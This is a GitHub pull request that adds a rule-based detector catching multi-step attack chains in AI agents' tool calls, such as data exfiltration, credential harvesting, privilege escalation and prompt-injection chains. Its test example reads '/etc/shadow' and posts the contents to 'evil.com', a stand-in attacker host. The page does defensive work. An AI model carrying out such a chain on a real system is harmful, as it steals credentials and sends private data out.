Skip to content

feat: multi-step attack-pattern detector with confidence scoring#5

Open
azizx4 wants to merge 1 commit into
Justin0504:mainfrom
azizx4:feat/attack-pattern-detector
Open

feat: multi-step attack-pattern detector with confidence scoring#5
azizx4 wants to merge 1 commit into
Justin0504:mainfrom
azizx4:feat/attack-pattern-detector

Conversation

@azizx4
Copy link
Copy Markdown

@azizx4 azizx4 commented May 31, 2026

Summary

Adds a new meta-kind detector (aegis.builtin.attack-pattern) that catches multi-step attack chains that existing single-step detectors miss. Each call is individually benign, but the sequence reveals the attack.

Example: read_file("/etc/shadow")http_post("https://evil.com") — each step passes on its own, but together it's data exfiltration. This detector blocks it.

What's new

  • 8 built-in attack playbooks with confidence scoring (0–100):

    Rule Chain Ontology
    DATA_EXFIL sensitive read → outbound send AAT-T5010
    CRED_HARVEST credential discovery → exfiltration AAT-T5011
    PRIV_ESCALATION recon → sensitive read → priv exec AAT-T5012
    PROMPT_INJECTION_CHAIN context poison → exploit AAT-T1001
    DESTRUCTIVE_ACTION recon → delete/drop/truncate AAT-T8004
    ENCODED_EXFIL sensitive read → encode → send AAT-T9001
    SUPPLY_CHAIN package install → execute AAT-T1003
    ARTIFACT_BACKDOOR write backdoor file → execute AAT-T6003
  • Confidence scoring with contextual bonuses/penalties:

    • Bonuses: high sensitivity data, external destination, fast timing, upstream anomaly signals, PPM sequence surprise, SlidingWindow burst detection
    • Penalties: internal destination, low sensitivity, long time gap
    • Configurable thresholds: blockThreshold (default 70), flagThreshold (default 40)
  • Custom Rules API: addRule() / removeRule() / getRules() — tenants can define their own attack playbooks at runtime

  • Wired into /api/v1/check: DetectorRegistry now participates in the check decision pipeline. Critical detector signals block requests (Layer 4, after policy + anomaly + DSL).

  • Environment-configurable: ATTACK_PATTERN_ENABLED, ATTACK_PATTERN_BLOCK_THRESHOLD, ATTACK_PATTERN_FLAG_THRESHOLD, ATTACK_PATTERN_WINDOW_MS

How it differs from existing SEQUENCE_ANOMALY

Existing (PPM) This PR (Attack Pattern)
Statistical: "this transition is unusual" Rule-based: "this is a known attack playbook"
No attack classification Names the attack (DATA_EXFIL, PRIV_ESCALATION, ...)
Binary anomaly score Contextual confidence score with explainable bonuses/penalties
Single transition (bigram) Multi-step chains (2–3+ steps)

Both are complementary — PPM surprise feeds into this detector's confidence as a bonus signal.

Files changed

File Change
detectors/built-in/attack-pattern-detector.ts New detector (480 LOC)
__tests__/attack-pattern-detector.test.ts Unit tests (34 tests)
__tests__/attack-pattern-integration.test.ts Integration tests via DetectorRegistry (15 tests)
__tests__/attack-pattern-vs-existing.test.ts Side-by-side comparison with existing detectors (28 tests)
detectors/index.ts Export new detector + types
config.ts Add attackPattern config section
server.ts Register detector with config + SlidingWindow
api/check.ts Wire DetectorRegistry into check decision pipeline

Test plan

  • 77 new tests across 3 test files — all pass
  • All 558 project tests pass (zero regressions)
  • TypeScript compiles with zero errors (tsc --noEmit)
  • Live server test: read_file("/etc/shadow")http_post("evil.com") returns "decision": "block" with reason "Multi-Step Data Exfiltration detected (confidence 90%)"
  • False-positive guards: read_file("report.pdf")send_email("boss@company.internal") passes through as "allow"

Add a new `meta`-kind detector that identifies multi-step attack chains
by tracking per-agent tool-call history and matching against known
attack playbooks. Each match is scored using contextual signals (data
sensitivity, destination trust, timing, upstream anomaly signals) to
minimize false positives.

8 built-in attack patterns:
- DATA_EXFIL (AAT-T5010): sensitive read → outbound send
- CRED_HARVEST (AAT-T5011): credential discovery → exfiltration
- PRIV_ESCALATION (AAT-T5012): recon → sensitive read → priv exec
- PROMPT_INJECTION_CHAIN (AAT-T1001): context poison → exploit
- DESTRUCTIVE_ACTION (AAT-T8004): recon → delete/drop/truncate
- ENCODED_EXFIL (AAT-T9001): sensitive read → encode → send
- SUPPLY_CHAIN (AAT-T1003): package install → execute
- ARTIFACT_BACKDOOR (AAT-T6003): write backdoor file → execute

Key features:
- Confidence scoring (0-100) with configurable block/flag thresholds
- Custom Rules API: addRule() / removeRule() / getRules()
- PPM upstream integration: sequence_anomaly signals boost confidence
- SlidingWindowStats integration: burst detection increases confidence
- Environment-configurable via ATTACK_PATTERN_* env vars
- Wired into /api/v1/check: critical detector signals block requests

77 new tests across 3 test files. All 558 project tests pass.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant